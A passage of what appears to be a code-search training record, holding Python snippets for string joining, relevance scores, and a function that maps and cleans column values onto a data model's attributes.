hasattr(the_val, \"__iter__\"):\n return \"[{}]\".format(\", \".join([str(v) for v in the_val]))\n return str(the_val)", "def __str__(self):\n return ' '.join([str(item) for item in self])", "def join(self, iterable):\n result = ANSIString(\"\")\n last_item = None\n for item in iterable:\n if last_item is not None:\n result += self._raw_string\n if not isinstance(item, ANSIString):\n item = ANSIString(item)\n result += item\n last_item = item\n return result", "def stringify(self, value):\n if isinstance(value, list):\n return \", \".join(value)\n else:\n return str(value)", "def generate_sql_update_set_formatted_string(keys_list: List[str]):\n\n return \", \".join([f\"{key} = :{key}\" for key in keys_list])", "def __str__(self):\n return str(self._name + \", \" + self._value)", "def my_join(iters, string):\n out = \"\"\n for i in range(iters):\n out += \",\" + string \n return out", "def concatenate_columns(params: List[str]) -> str:\n convert_columns_to_string = [f'string({col})' for col in params]\n\n return f\"concat({','.join(convert_columns_to_string)})\"", "def __str__(self):\n self.vals.sort()\n return '{' + ','.join([str(e) for e in self.vals]) + '}'", "def _convertListToString(self, list_of_objects):\n return (';').join(list_of_objects)", "def __str__(self):\n if self.is_empty():\n return \"\"\n return \" \".join(list(iter(self)))", "def __str__(self):\n output = []\n output.append(str(self.x))\n output.append(str(self.p))\n return \" \".join(output)", "def value_to_output(value, output):\n if value != \"\":\n output.append(value)\n return \"\"", "def join(self, tokens):\n if self.chars:\n joiner = ''\n else:\n joiner = ' '\n return joiner.join(tokens)", "def concatenate(row, fields):\n print row\n str = None\n for field in fields:\n if str == None:\n str = row[field]\n else:\n str += ' ' + row[field]\n return str", "def join_typeval(self, type_, val):\n return self.splitter.join((type_, val))", "def __str__(self):\r\n self.vals.sort()\r\n return '{' + ','.join([str(e) for e in self.vals]) + '}'", "def __unicode__(self):\n\t\tresult = unicode(self.input_path) +', '+ unicode(self.output_path)\n\t\treturn result", "def word_join(self, words):\n return \" \".join(words)", "def to_string(self):\n filter_string = '('\n variable_length = len(self.values) - 1\n for index in range(0, variable_length + 1):\n filter_string += '&' + self.values[index]\n # append or for all but the last\n if index < variable_length:\n filter_string += self.combination_operator\n filter_string += ')'\n\n return filter_string", "def concatenate_string(stringy1, stringy2):\n\n return \"{} {}\".format(stringy1, stringy2)", "def _concatenate_instance(\n self,\n emotion: str,\n target_utterance: str,\n evidence_utterance: str,\n conversation_history: str,\n ) -> str:\n concatenated_text = (\n \" \"\n + emotion\n + \" <SEP> \"\n + target_utterance\n + \" <SEP> \"\n + evidence_utterance\n + \" <SEP> \"\n + conversation_history\n )\n\n return concatenated_text", "def combine(self):\n # If the contents of this command should be hidden from the main .cfg,\n # discard them.\n if self.hide_children:\n return \"\"\n\n # Set the evaluation state of this instance to COMBINE, as its code has\n # been generated.\n self.eval_state = COMMAND_EVAL_COMBINE\n\n # output will store the contents of this instance; meaning its code and\n # the code of its children.\n output = []\n\n # Loop through children and evaluate them.\n for ch in self.children:\n # Only evaluate children if they haven't been yet (i.e., their eval\n # state is not COMMAND_EVAL_COMBINE)\n if ch.eval_state == COMMAND_EVAL_REGISTER:\n gen = ch.generate()\n if gen is not None:\n output.append('alias \"'+str(ch)+'\" \"'+gen+'\"')\n output.extend(ch.combine())\n\n return output", "def __str__(self):\n string = \"\"\n for i in self.tour_ids:\n string = string + str(i) + \" -> \"\n string += str(self.tour_ids[0])\n return string", "def __str__(self):\n return str(self._key) + \", \" + str(self._value[0]) + \", \" + str(self._value[1])", "def my_join(iters, string):\n out=''\n for i in range(iters):\n out += string.join(\", \")\n #add string together with , as seperator\n #repeat iters numbers of times\n return out", "def testRegisterConcatenation(self):\n reg_one = ShiftRegister(2)\n reg_one.shift(\"a\")\n reg_one.shift(\"b\")\n reg_two = ShiftRegister(3)\n reg_two.shift(\"c\")\n reg_two.shift(\"d\")\n reg_two.shift(\"e\")\n reg_cat = reg_one.concatenate(reg_two)\n self.assertEqual(''.join(reg_cat), \"abcde\")", "def __str__(self):\n output = \"\"\n for i in self.values:\n st = []\n output += \"[\"\n for j in i:\n st.append(str(j))\n output += \",\".join(st)+\"]\"\n return str(self.m)+\"x\"+str(self.n)+\" [\" + output + \"]\"", "def concatenate_processed_text(self):\n\n\n\t\tconcatenated_text = \"\"\n\t\tfor line in self.processed_text:\n\t\t\tconcatenated_text += \" \".join(line) + \" \"\n\n\n\t\t# Remove the trailing space character from the concatenated string\n\t\t# of words.\n\t\tconcatenated_text = concatenated_text[:-1]\n\n\t\tself.concatenated_text = concatenated_text", "def rejoin(textList):\n return ','.join(textList)", "def __str__(self):\n values = \"\"\n node = self.head\n while node:\n values = values + \"{} \".format(node.__str__())\n node = node.next\n return values", "def Join(sourcearray, delimeter=\" \"):\n s_list = list(map(str, sourcearray))\n return delimeter.join(s_list)", "def concat_strings(l_strings):\n if l_strings == []:\n return \"\"\n else: \n return l_strings[0] + \" \" + concat_strings(l_strings[1:])", "def as_str(self):\n connectivity_str = '_'.join(map(str, self.values))\n return connectivity_str", "def irchain_str(self):\n s = []\n if self.irlen_before:\n s.append('%d' % self.irlen_before)\n s.append('(%d)' % self.irlen)\n if self.irlen_after:\n s.append('%d' % self.irlen_after)\n return ','.join(s)", "def __str__(self):\n assert not hasattr(self, \"value\")\n if self.is_set:\n return \"%s \" % self.names[0]\n else:\n return \"\"", "def full_str(self):\n outstr = self._field1 + \": \"\n outstr = outstr + str(self._field2)\n return outstr", "def __str__(self):\n return ' '.join([self.chromosome, self.strand, self.full_position])", "def concatenate_string(string1, stringy2):\n return string1 + \" \" + stringy2", "def __str__(self):\r\n\t\tstrRepr = ''\r\n\t\tfor i, person in enumerate(self.people):\r\n\t\t\tassignmentsString = ','.join((self.assignments[i,:].astype(int)).astype(str))\r\n\t\t\tstrRepr += '{0},{1}\\n'.format(person.uid, assignmentsString)\r\n\t\treturn strRepr", "def __str__(self):\n s = ''\n for node in self.nodes:\n s += '\\n\\n'+str(node)+'\\n\\t'\n edges = node.getChildren()\n keys = edges.keys()\n keys.sort()\n for key in keys:\n bounds = edges[key].getSuffix()\n s += str(edges[key])+' '\n for i in xrange(bounds[0], bounds[1]):\n s += self.target[i]\n s += '\\n\\t'\n return s", "def __str__(self):\t\t\n\t\tcadena = []\n\t\tactual = self.prim\t\t\n\t\twhile actual:\n\t\t\tif type(actual.dato) == str:\n\t\t\t\tcadena.append(\"'\" + str(actual.dato) + \"'\")\n\t\t\telse:\t\n\t\t\t\tcadena.append(str(actual.dato))\n\t\t\tactual = actual.prox\n\t\treturn \"[\" + \", \".join(cadena) + \"]\"", "def my_join(iters, string):\n out = ''\n for i in range(iters):\n out += \", \" + string\n return out", "def join(*args, **kwargs):\n if args:\n print ', '.join([str(s) for s in args])\n if kwargs:\n sub_items = []\n for k, v in kwargs.items():\n sub_items.append(''.join([k, '=', v]))\n print ', '.join(sub_items)", "def __str__(self):\n return 'Target with value ' + str(self.attributes[AT.VALUE])", "def __str__(self):\n s = 'word chain: ' + '\\n'\n for word in self._used_words[:-1]:\n s += word + ' -> '\n s += self._used_words[-1] + '\\ntarget word: ' + self._target\n return s", "def concat_text(text):\n textout = \" \".join(text)\n return textout", "def _toStr(toList):\n\n names = [formataddr(i) for i in zip(*toList)]\n return ', '.join(names)" ]
[ "0.66425836", "0.64691097", "0.63475597", "0.6099031", "0.60475785", "0.60406435", "0.604041", "0.60189885", "0.6017926", "0.5998727", "0.5937355", "0.5918181", "0.5915184", "0.5901235", "0.5898622", "0.58785903", "0.5799823", "0.5796432", "0.5734698", "0.5730965", "0.5715827", "0.5704806", "0.56980455", "0.5658565", "0.56432956", "0.5640445", "0.56382054", "0.5609051", "0.5607827", "0.5597937", "0.55867726", "0.5580681", "0.5576363", "0.5575408", "0.5575157", "0.5574907", "0.5574505", "0.55392385", "0.55301577", "0.5529245", "0.55238545", "0.5516037", "0.5513661", "0.55084425", "0.55067366", "0.5499419", "0.5481192", "0.5472112", "0.5463274", "0.5462388", "0.54557735", "0.54438215", "0.5442796", "0.5440702", "0.54328763", "0.54143417", "0.54139704", "0.5407667", "0.5394633", "0.53843665", "0.5383876", "0.5379409", "0.5379066", "0.53783274", "0.53749716", "0.5371934", "0.5370813", "0.534244", "0.5340177", "0.53383905", "0.5334602", "0.5325343", "0.5324787", "0.5316288", "0.530826", "0.5306069", "0.53038937", "0.5300695", "0.5294775", "0.5292959", "0.52911043", "0.5288605", "0.5288592", "0.5285204", "0.527543", "0.5269405", "0.5266008", "0.5260926", "0.52607834", "0.52495176", "0.5249019", "0.524729", "0.52444786", "0.52417827", "0.5241666", "0.52411336", "0.52296025", "0.52248687", "0.5223323", "0.52148527" ]
0.54848677
46
Set the column value as the target attr on our model.
def apply_column_value(raw_column_name, column_value, model, mapping, is_extra_data, cleaner): # If the item is the extra_data column, then make sure to save it to the # extra_data field of the database if raw_column_name in mapping: table_name, mapped_column_name, display_name, is_extra_data = mapping.get(raw_column_name) # special postal case: if mapped_column_name in ['postal_code', 'owner_postal_code']: if '-' in str(column_value): postal = str(column_value).split('-')[0].zfill(5) ext = str(column_value).split('-')[1].zfill(4) column_value = postal + '-' + ext column_value = str(column_value).zfill(5) cleaned_value = None if cleaner: # Get the list of Quantity fields from the Column object in SEED. This is non-ideal, since the # rest of the mapping code does not use SEED models. Perhaps make this an argument. if (model.__class__.__name__, mapped_column_name) in apps.get_model('seed', 'Column').QUANTITY_UNIT_COLUMNS: # clean against the database type first cleaned_value = cleaner.clean_value(column_value, mapped_column_name, is_extra_data) # This is a temporary fix for when the raw_column_name and the mapped_column_name # are the same. It causes the units to be cast twice since the cleaner look up finds # the same column twice. The cleaner needs to be cleaned up quite a bit to handle # this error correctly. if mapped_column_name != raw_column_name: # now clean against the raw name with pint (Quantity Units) because that's the column # that holds the units needed to interpret the value correctly cleaned_value = cleaner.clean_value(cleaned_value, raw_column_name, is_extra_data) else: cleaned_value = cleaner.clean_value(column_value, mapped_column_name, is_extra_data) else: cleaned_value = default_cleaner(column_value) if is_extra_data: if hasattr(model, 'extra_data'): # only save it if the model and the mapping are the same if model.__class__.__name__ == table_name: if isinstance(cleaned_value, (datetime, date)): # TODO: create an encoder for datetime once we are in Django 1.11 model.extra_data[mapped_column_name] = cleaned_value.isoformat() else: model.extra_data[mapped_column_name] = cleaned_value else: # Simply set the field to the cleaned value if it is the correct model if model.__class__.__name__ == table_name: setattr(model, mapped_column_name, cleaned_value) return model
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_attribute(self, name, value):\n attrs = self._column.attrs\n attrs[name] = value\n self._column.attrs = attrs", "def __set__(self, instance, value):\r\n if instance:\r\n return instance._values[self.column.column_name].setval(value)\r\n else:\r\n raise AttributeError('cannot reassign column values')", "def target(self, value):\n self._target = value", "def set_attribute(self, name, value):\n\n pass", "def set_attribute(self, attr, value):\n logger.debug(\"SET ATTRIBUTE {} to {}\".format(attr, value))", "def set_attribute(self, attr, value):\n super().set_attribute(attr, value) # Keep this line, it triggers the parent class method.\n setattr(self, attr, value)", "def _set_action_attribute(self, action, index, setdataarg):\n if isinstance(setdataarg.column, int):\n column = setdataarg.column\n else:\n column = getattr(self, setdataarg.column)\n data = self.get_data(index, setdataarg.role, column)\n if data is None:\n return\n setattrmethod = getattr(action, setdataarg.setfunc)\n if setdataarg.convertfunc:\n data = setdataarg.convertfunc(data)\n setattrmethod(data)", "def set_attribute(self, name, value):\n setattr(self, '%s__' % name, value_or_none(value))", "def set_attr(self, name, value):\n setattr(self, name, value)", "def set_value ( self, object, row, value ):\n column = self.get_data_column( object )\n column[ row ] = type( column[ row ] )( value )", "def target(self, target):\n self.__target = float(target)", "def set_value ( self, object, value ):\n target, name = self.target_name( object )\n setattr( target, name, value )", "def __setattr__(self, attr, value):\n field = getattr(self, attr)\n if isinstance(field, BaseType):\n # Check the value type\n check = field.accept_value(value)\n \n old_value = getattr(self, attr)\n object.__setattr__(self, attr, value)\n if isinstance(old_value, BaseType):\n # Not set yet\n old_value = None\n \n if Model.data_connector and Model.data_connector.running:\n with Model.data_connector.u_lock:\n Model.data_connector.update_object(self, attr, old_value)", "def _setAttr(self, attrName, value):\n\n if (value not in (None, \"\")):\n setattr(self, attrName, value)", "def _set_attribute(\n self, param_name, attr_name, value, matrix_shape, time_steps=None\n ):\n _validate_param_shape(\n param_name=param_name,\n matrix_shape=matrix_shape,\n actual_shape=value.shape,\n time_steps=time_steps,\n )\n setattr(self, attr_name, value)", "def write(self, value):\n self.get_attr().SetValue(value)", "def setCol(self, col):\n self.column = col", "def __setattr__ (self, attr, val):\n try:\n attrib = object.__getattribute__(self, attr)\n except AttributeError:\n object.__setattr__ (self, attr, val)\n return\n\n if not isinstance (attrib, RField):\n object.__setattr__ (self, attr, val)\n return\n\n if isinstance (attrib, ForeignKey):\n self.keyvals[attr] = val.id\n self.keyvals['__relationfor__'] = attrib.relation\n else:\n self.keyvals[attr] = val", "def set_attr(self, asset_key, attr, value=True):\r\n self.set_attrs(asset_key, {attr: value})", "def set_attr(self, attr_name: str, value: Any, indices: VecEnvIndices = None) -> None:\n raise NotImplementedError()", "def __setattr__(self, attr, v):\n s = cleanup_name(attr)\n try:\n self[self[\"__psvcolumnstracker__\"][attr]] = v\n except KeyError:\n if attr in self.__sawhitelist__:\n super(Row, self).__setattr__(attr, v)\n else:\n keys = self[\"__psvcolumnstracker__\"].keys() \n if s in keys:\n raise AttributeError((\n \"{}{}\"\n .format(\n '\\'{}\\' has no attribute \\'{}\\''.format(\n type(self), attr),\n \". However, '{s}' is an existing condensed \".format(s=s) +\n \"column name. Only the condensed version is supported.\"\n .format(s=s)\n )))\n else:\n # A somewhat hacky implementation of Dict's restriction of editing it's\n # Attributes.\n if attr in dir(self):\n raise AttributeError(\n msg.attribute_readonly.format(classname=self.__class__, attr=attr))\n else:\n raise AttributeError(msg.attribute_missing.format(\n type(self), attr))", "def set(self, attr, val):\r\n self.__dict__[attr] = val", "def set_attr(self, attr_name, value, indices=None):\n target_remotes = self._get_target_remotes(indices)\n for remote in target_remotes:\n remote.send(('set_attr', (attr_name, value)))\n for remote in target_remotes:\n remote.recv()", "def apply_to_table(self, table: Table):\n table.change_column(self.column)", "def __setattr__ (self, attr, value):\n self.set_value (attr, value)", "def __set__(self, instance, val):\n raise AttributeError(\"Can't set attribute\")", "def set_value(self, row, colName, value):\n\t\tself[row][self._columns[colName]] = value", "def __setattr__(self, attr, value):\n super().__setattr__(attr, value)", "def corner_case_setattr(target, attr, value):\n if isinstance(target, collections.abc.Sequence):\n target[int(attr)] = value\n elif isinstance(target, collections.abc.Mapping):\n target[attr] = value\n else:\n setattr(target, attr, value)", "def setColumn(self,item,column,value):\n raise UncodedError", "def before_update(mapper, conn, target):\n if isinstance(target, Column):\n raise TypeError('Got a column instead of a table')\n\n if target.id_ is None:\n dataset_id = ObjectNumber.parse(target.d_id)\n target.id_ = str(TableNumber(dataset_id, target.sequence_id))", "def set_attribute(self, name, value, observed, author, author_nickname,\n author_affiliation, comment):\n setattr(self, '%s__' % name, value_or_none(value))\n setattr(self, '%s__observed' % name, value_or_none(observed))\n setattr(self, '%s__author' % name, value_or_none(author))\n setattr(self, '%s__author_nickname' % name,\n value_or_none(author_nickname))\n setattr(self, '%s__author_affiliation' % name,\n value_or_none(author_affiliation))\n setattr(self, '%s__comment' % name, value_or_none(comment))", "def Y_target(self, value):\n self._Y_target = value", "def set(self, attrname, value):\n setattr(self, attrname, value)\n self.dirty = True", "def set(self, properties):\n self._column.attrs = properties", "def set(self, attribute, value):\n self.__setattr__(attribute, value)", "def column(self, column):\n\n self._column = column", "def setattr(self, node, attr, value):\n node.set(attr, value)", "def setcolumn(self, column, value, accept_small_names=True):\n if column in self.keys():\n self[column] = value\n return\n elif accept_small_names:\n if self[\"__psvcolumnstracker__\"].get(column):\n self.__setattr__(column, value)\n return\n if not accept_small_names:\n raise ValueError(\"'{}'\".format(column))\n else:\n raise ValueError(\"'{}'. Make sure the shorterned columns name have no collisions\".format(column))", "def propagate_attribute(self, attr, val):\n self.activities.propagate_attribute(attr, val)", "def _set_model_field(self):\n self._field_value = hutils.format_json(self._memory_data)\n setattr(self._model, self._field, self._field_value)", "def set_attribute(self, path, name, value):\n if self.options['storage_method'] == 'hdf5':\n # execute h5py command\n self.file_pointer[path].attrs[name] = value\n elif self.options['storage_method'] == 'none':\n # save command for later processing\n self.h5commands.append((\"set_attribute\", path, name, value))\n else:\n raise Exception('Invalid option value for storage_method (%s)' % storage_method)", "def __setattr__(self, name, value):\n if name == 'source' or name == 'destination':\n # produce \"canonical\" form of a source / destination\n # FIXME: we need to handle arbitrary netmasks here\n if value is not None and value.endswith('/32'):\n value = value[:-3]\n elif name == 'goto' or name == 'jump':\n if value is not None and not isinstance(value, Target):\n value = Target(value)\n elif name == 'matches':\n if not isinstance(value, list):\n raise Exception(\"matches attribute requires a list\")\n self.__dict__[name] = value", "def setAttributeValue(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\n pass", "def setter(self, value):\n if field.readonly:\n raise fields.ValidationError(f\"'{name}' is a read only attribute\")\n\n # accept if this is a raw value too\n value = field.from_raw(value)\n\n # validate\n field.validate(value)\n\n # set current instance as parent for embedded objects/instances\n if isinstance(field, fields.Object):\n value.parent = self\n\n # se attribute\n setattr(self, inner_name, value)\n self._attr_updated(name, value)", "def __setattr__(self, attr, value):\n self[attr] = value", "def set_attr(self, session, k, v, **kwargs):\n if getattr(self, 'set_' + k, None):\n # setter method exists\n getattr(self, 'set_' + k)(session, v, **kwargs)\n else:\n setattr(self, k, v)", "def SetAttribute(self, attr, val):\n attrs = self.GetAttributes()\n attrs[attr] = val\n return self.SetAttributes(attr, attrs)", "def set(self, attribute: str, value: Any):\n return setattr(self, attribute, value)", "def map_cols_to_attr(self):\n ## this is from the base class:\n ## for attr, label in zip(self.attr_names, self.labels):\n ## col_ind = self.col_inds[label]\n ## if len(self.data) > 0:\n ## setattr(self, attr, self.data[:,col_ind])\n #\n # hard coding based on what I know about saleae files:\n self.t = self.data[:,0]#.astype(float)\n nr, nc = self.data.shape\n self.num_cols = nc-1\n \n for i in range(0,self.num_cols):\n attr = 'ch_%i' % i\n j = i+1\n setattr(self, attr, self.data[:,j])#.astype(float))", "def __setattr__(self, name, value):\n self.set(**{name: value})", "def target(self, target):\n\n self._target = target", "def set_attr_values(self):\n ats = self.attributes # convenient short name\n for aid in ats:\n value = ats[aid]['nv'] if 'nv' in ats[aid] else (\n ats[aid]['value'] if 'value' in ats[aid] else None)\n if value is not None:\n# self.h5node.attrs[aid] = value\n #- self.file.file_pointer[self.full_path].attrs[aid] = value\n self.file.set_attribute(self.full_path, aid, value)\n #- self.file.h5save_attribute(self.full_path, aid, value)\n #- self.file.h5commands.append(\"set attribute(%s:%s)-%s\" % (self.full_path,\n #- aid, value))", "def attribute_value(self, attribute_value):\n\n self._attribute_value = attribute_value", "def __set__(self, obj, value):\n\n return setattr(obj, '_' + self.name, value)", "def set_attribute(self, context: ResourceCommandContext, obj_ref: str, attr_name: str, attr_value: str) -> None:\n self.handler.set_attribute(obj_ref, attr_name, attr_value)", "def __setattr__(self, attr_k, val):\n # Dynamically setting the value of the Field\n try:\n attr = object.__getattribute__(self, attr_k)\n except AttributeError:\n attr = None\n if issubclass(attr.__class__, Field):\n attr.value = val\n else:\n return object.__setattr__(self, attr_k, val)", "def change_attr(self) -> None:\n\n self.attr = randint(0, 10)", "def _set_document_attribute(self, doc, row, mapping):\n # Unpack mapping info.\n try:\n attr, col_idx, convertor = mapping\n except ValueError:\n try:\n attr, col_idx = mapping\n except ValueError:\n print mapping\n raise ValueError()\n convertor = None\n\n # Convert cell value.\n if col_idx.find(\"-\") == -1:\n attr_value = self._get_cell_value(row, convert_col_idx(col_idx), convertor)\n else:\n col_idx_from, col_idx_to = [convert_col_idx(i) for i in col_idx.split(\"-\")]\n attr_value = [i for i in (self._get_cell_value(row, i, convertor)\n for i in range(col_idx_from, col_idx_to + 1)) if i]\n\n # Set aattribute value.\n setattr(doc, attr, attr_value)", "def set_value(self, value):\n for row in self.rows:\n row.set_values(value)", "def SetTarget(self, entity):\n\t\tself.target = entity", "def add_attribute(self, col, attr_name):\n # not optimised: not expected to be a usual operation\n new_table = np.c_[self.np_table, col]\n new_attributes = self.attributes + [attr_name]\n self.__init__(new_table, self.objects, new_attributes)", "def set_target(self, target):\n # parse target objects\n res = []\n targets = target.split(',')\n for item in targets:\n res.append(item)\n self.target = res\n \n # create conversion table for new index\n self.conversion = {}\n for i, cat in enumerate(self.target):\n self.conversion[cat] = f'{i}'", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def set_attribute(self, key: str, value: types.AttributeValue) -> None:\n if \"otel_attributes\" not in self.elastic_span.context:\n self.elastic_span.context[\"otel_attributes\"] = {}\n self.elastic_span.context[\"otel_attributes\"][key] = value", "def set_attr_impl(context, builder, sig, args, attr):\n typ, valty = sig.args\n target, val = args\n\n if attr in typ.struct:\n # It's a struct member\n inst = context.make_helper(builder, typ, value=target)\n data_ptr = inst.data\n data = context.make_data_helper(builder, typ.get_data_type(),\n ref=data_ptr)\n\n # Get old value\n attr_type = typ.struct[attr]\n oldvalue = getattr(data, _mangle_attr(attr))\n\n # Store n\n setattr(data, _mangle_attr(attr), val)\n context.nrt.incref(builder, attr_type, val)\n\n # Delete old value\n context.nrt.decref(builder, attr_type, oldvalue)\n\n elif attr in typ.jit_props:\n # It's a jitted property\n setter = typ.jit_props[attr]['set']\n disp_type = types.Dispatcher(setter)\n sig = disp_type.get_call_type(context.typing_context,\n (typ, valty), {})\n call = context.get_function(disp_type, sig)\n call(builder, (target, val))\n _add_linking_libs(context, call)\n else:\n raise NotImplementedError(\n 'attribute {0!r} not implemented'.format(attr))", "def set_h5py_attr(attrs, key, val):\n if isinstance(val, basestring):\n val = np.string_(val)\n elif isinstance(val, Iterable) and len(val) > 0:\n if isinstance(val[0], basestring):\n val = np.array(val, dtype='S')\n attrs[key] = val", "def target_id(self, target_id):\n\n self._target_id = target_id", "def set_value(attr_name, value, gpu_id):\n place = fluid.CPUPlace() if gpu_id < 0 \\\n else fluid.CUDAPlace(gpu_id)\n var = _fetch_var(attr_name, return_numpy=False)\n var.set(value, place)", "def set_col( self, col ):\n self.ix_col = col", "def setData(self, index, value, role=QtCore.Qt.DisplayRole):\n if self.verbose: print('myPandasModel.setData()')\n print(' myPandasModel.setData() row:', index.row(), 'column:', index.column(), 'value:', value, type(value))\n #if index.column() == self.includeCol:\n\n # dataChanged is inherited from QAbstractItemModel\n #topLeftIndex = index\n #bottomRightIndex = index\n #self.dataChanged.emit(index, index)\n\n if 1:\n\n #print('value:', value, type(value))\n v = self._data.iloc[index.row(), index.column()]\n #print('before v:',v, type(v))\n #print('isinstance:', isinstance(v, np.float64))\n if isinstance(v, np.float64):\n try:\n value = float(value)\n except (ValueError) as e:\n print('please enter a number')\n return False\n\n # set\n self._data.iloc[index.row(), index.column()] = value\n\n v = self._data.iloc[index.row(), index.column()]\n print(' after v:',v, type(v))\n return True\n return True", "def __setattr__(self, name, value):\n raise AttributeError(\"You cannot modify attributes on a %s\" % self.__class__.__name__)", "def setData(self, index, value):\n \n self.state[index.row()][index.column()] = value\n return value", "def __setitem__(self, attr, value):\n if attr in self._immutable.keys():\n raise ErrorInvalidField(\"You may not change the %s field\" \\\n % (attr,))\n super(ImmutableColumnFamily, self).__setitem__(attr, value)", "def setTarget(self, target):\n\n self._target = target", "def set_value (self):\n raise NotImplementedError", "def set(self):\n return AttributeFunctor(self, lambda x, y: y)", "def __setattr__(cls, name, value):\n if cls.__initialized and name not in _POST_INIT_ATTRIBUTE_NAMES:\n raise AttributeError('May not change values: %s' % name)\n else:\n type.__setattr__(cls, name, value)", "def __setattr__(self, attr, value):", "def __setattr__(self, attr, value):\r\n return setattr(self.__instance, attr, value)", "def __setattr__ (self, name, value):\n\t\ttry:\n\t\t\tself.__dict__[name] # Do not delete this line (it verifies the existence of an attribute)\n\t\t\t# Positioning of the existing attribute\n\t\t\tself.__dict__[name] = value\n\t\texcept KeyError:\n\t\t\t# The attribute does not exist is probably value of the structure\n\t\t\tself.__dict__[\"value\"][name] = value", "def __setattr__(self, name, value):\n assert name != 'cid' # can't see a reason to set a cid after construction\n self._set_attr(silent=False, **{name: value})", "def add_value(self, value, attr):\n self.index[value] = attr", "def __setattr__(self, attr, value):\n\t\treturn setattr(self.__instance, attr, value)", "def target(self, target) :\n\t\ttry :\n\t\t\tself._target = target\n\t\texcept Exception as e:\n\t\t\traise e", "def target(self, target) :\n\t\ttry :\n\t\t\tself._target = target\n\t\texcept Exception as e:\n\t\t\traise e", "def transform(self, X):\n\n X = super().transform(X)\n\n X[self.columns] = self.value\n\n return X", "def setValue(self, value):\n self.setValues((value, value))", "def set_attribute(self, name, value, comment):\n setattr(self, '%s__' % name, value_or_none(value))\n setattr(self, '%s__comment' % name, value_or_none(comment))", "def __setitem__(self, key, val):\r\n if not isinstance(key, basestring):\r\n raise TypeError\r\n if key not in self._columns.keys():\r\n raise KeyError\r\n return setattr(self, key, val)", "def set_attr(self, name: str, values: Union[list, tuple, object]):", "def __setitem__(self, feature, value):\n setattr(self, feature, value)", "def add_attribute(self, key, value):\n if key == \"process_step\":\n self.process_step = value\n elif key == \"source\":\n self.source = value\n else:\n self.attributes[key] = value", "def assign(self, value):\n self.value = value", "def _fset(self, value):\n # type: (...) -> None\n rtype = type_\n if isinstance(type_, TypeVar):\n type_map = dict(\n zip(self.__parameters__, self.__orig_class__.__args__)\n )\n rtype = type_map[type_]\n if not is_instance(value, rtype):\n raise TypeError(\n \"Cannot assign type of {} to attribute of type {}.\".format(\n _get_type_name(type(value)), _get_type_name(rtype)\n )\n )\n vars(self)[private_attr] = value" ]
[ "0.7223488", "0.69311714", "0.6659743", "0.65025675", "0.64680314", "0.64388746", "0.64149034", "0.63883615", "0.6383518", "0.63276327", "0.6326977", "0.6314786", "0.62230754", "0.62147987", "0.61330974", "0.6095479", "0.6058556", "0.6057366", "0.6056918", "0.6027524", "0.60270506", "0.602608", "0.60205853", "0.60176444", "0.601005", "0.6004293", "0.5941176", "0.5937554", "0.591173", "0.59069604", "0.58950204", "0.58945984", "0.58814204", "0.5881255", "0.5854663", "0.58532166", "0.5834929", "0.58336985", "0.58327425", "0.578196", "0.57815856", "0.5779111", "0.5769053", "0.57650256", "0.5756759", "0.57517874", "0.573666", "0.5731145", "0.5727346", "0.5685613", "0.56762123", "0.5671452", "0.5662832", "0.56442547", "0.5636912", "0.56360716", "0.56122", "0.56054705", "0.55772895", "0.5576523", "0.5575319", "0.55622965", "0.5561221", "0.55563337", "0.55563337", "0.55563337", "0.55563337", "0.55563337", "0.55563337", "0.55563337", "0.5536808", "0.55197245", "0.5509459", "0.55050814", "0.54927117", "0.54847455", "0.54840446", "0.5482762", "0.5482369", "0.5479424", "0.54664093", "0.5456287", "0.5442012", "0.5435965", "0.54248106", "0.5421817", "0.54185784", "0.54110456", "0.54095584", "0.54047275", "0.5403697", "0.5403697", "0.5401307", "0.5399346", "0.5395221", "0.5394898", "0.5394842", "0.5389672", "0.5380771", "0.537941", "0.5376318" ]
0.0
-1
Go through the list of dictionaries and setup their keys.
def _set_default_concat_config(concat): concat = concat or [] if not isinstance(concat, list): concat = [concat] for c in concat: c['target'] = c.get('target', '__broken_target__') c['concat_columns'] = c.get('concat_columns', []) c['delimiter'] = c.get('delimiter', ' ') c['concat_values'] = {} return concat
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def example_dict_from_dict_list(dict_list,recursive=False):\n if not isinstance(dict_list,list):\n if isinstance(dict_list,dict):\n dict_list = [dict_list]\n else:\n raise TypeError(\"dict_list must be a dict or a list of dicts\")\n else:\n if not all([isinstance(x,dict) for x in dict_list]):\n raise TypeError(\"dict_list must be a dict or a list of dicts\")\n all_keys = set([])\n [all_keys.update(this_dict.keys()) for this_dict in dict_list] # this constructs a list of all keys encountered in the list of dicts\n example_dict = dict()\n keys_remaining_to_find = all_keys\n for this_dict in dict_list:\n new_keys = list(set(keys_remaining_to_find).intersection(this_dict.keys()))\n if not new_keys: continue\n new_dict = {k:this_dict[k] for k in new_keys if this_dict[k]} # keep only keys with non-empty and non-none value\n example_dict = dict(example_dict,**{k:v for k,v in new_dict.items()})\n keys_remaining_to_find = keys_remaining_to_find.difference(new_keys)\n if not keys_remaining_to_find: break # if there's no more keys to be found, you can quit\n\n if recursive==True:\n dict_list_keys = [k for k in example_dict.keys() if (k and is_dict_or_list_of_dicts(example_dict[k]))]\n for k in dict_list_keys:\n example_dict[k] = example_dict_from_dict_list(example_dict[k],recursive=True)\n return example_dict", "def _initialize_dicts(action_list):\n\n act_to_int = {}\n int_to_act = {}\n\n # Loop through the list and store it in the dictionaries\n for i, action in enumerate(action_list):\n act_to_int[action] = i\n int_to_act[i] = action\n\n return act_to_int, int_to_act", "def pair_keys(list_of_dicts, first_key, second_key):\n return [{ dictionary[first_key]: dictionary[second_key] } \n for dictionary in list_of_dicts]", "def _set_keys(self, listOfKeys):\n self._keys = listOfKeys", "def reorder_dict_HELPER(dict, key_list):\n temp_dict = {}\n\n for key in key_list:\n try:\n temp_dict[key] = dict[key]\n except KeyError:\n continue\n\n dict = temp_dict", "def _coalesce_dicts(self, list_of_dicts):\n coalesced_list_of_dicts = [{}]\n for item in list_of_dicts:\n found = False\n for dict_items in 